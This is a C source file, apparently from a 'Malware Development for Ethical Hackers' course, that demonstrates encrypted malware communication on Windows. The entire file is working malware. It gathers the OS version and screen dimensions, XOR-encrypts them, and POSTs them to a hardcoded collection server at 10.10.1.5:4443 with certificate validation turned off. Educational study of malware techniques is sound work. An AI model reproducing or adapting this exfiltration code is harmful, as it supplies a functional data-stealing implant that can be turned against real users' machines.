/*
 * Malware Development for Ethical Hackers
 * hack.c
 * cryptography in malware communication
 * author: @cocomelonc
*/
#include <windows.h>
#include <winhttp.h>
#include <stdio.h>
#include <stdbool.h>

char xor_key[] = "k";

bool encryptData(char* data, size_t dataSize) {
  for (size_t i = 0; i < dataSize; ++i) {
    data[i] ^= xor_key[0]; // Perform XOR encryption
  }
  return true;
}

bool hack() {
  HINTERNET hSession = NULL, hConnect = NULL, hRequest = NULL;
  DWORD bytesRead;
  char systemInfo[4096];

  // Get system information
  snprintf(systemInfo, sizeof(systemInfo),
       "OS Version: %d.%d.%d\nScreen Width: %d\nScreen Height: %d\n",
       GetVersion() & 0xFF, (GetVersion() >> 8) & 0xFF, (GetVersion() >> 16) & 0xFF,
       GetSystemMetrics(SM_CXSCREEN), GetSystemMetrics(SM_CYSCREEN));

  // Encrypt system information
  encryptData(systemInfo, strlen(systemInfo));

  hSession = WinHttpOpen(L"SystemInfoClient/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
  if (hSession == NULL) {
    fprintf(stderr, "WinHttpOpen. error: %d has occurred.\n", GetLastError());
    return false;
  }

  hConnect = WinHttpConnect(hSession, L"10.10.1.5", 4443, 0);
  if (hConnect == NULL) {
    fprintf(stderr, "WinHttpConnect. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hSession);
    return false;
  }

  hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
  if (hRequest == NULL) {
    fprintf(stderr, "WinHttpOpenRequest. error: %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return false;
  }

  DWORD dwFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
      SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
      SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
  WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &dwFlags, sizeof(dwFlags));

  if (!WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, systemInfo, strlen(systemInfo), strlen(systemInfo), 0)) {
    fprintf(stderr, "WinHttpSendRequest. error %d has occurred.\n", GetLastError());
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return false;
  }

  if (!WinHttpReceiveResponse(hRequest, NULL)) {
    fprintf(stderr, "WinHttpReceiveResponse. Error %d has occurred.\n", GetLastError());
    return false;
  }

  WinHttpCloseHandle(hRequest);
  WinHttpCloseHandle(hConnect);
  WinHttpCloseHandle(hSession);

  printf("system information sent successfully.\n");
  return true;
}

int main() {
  hack();
  return 0;
}
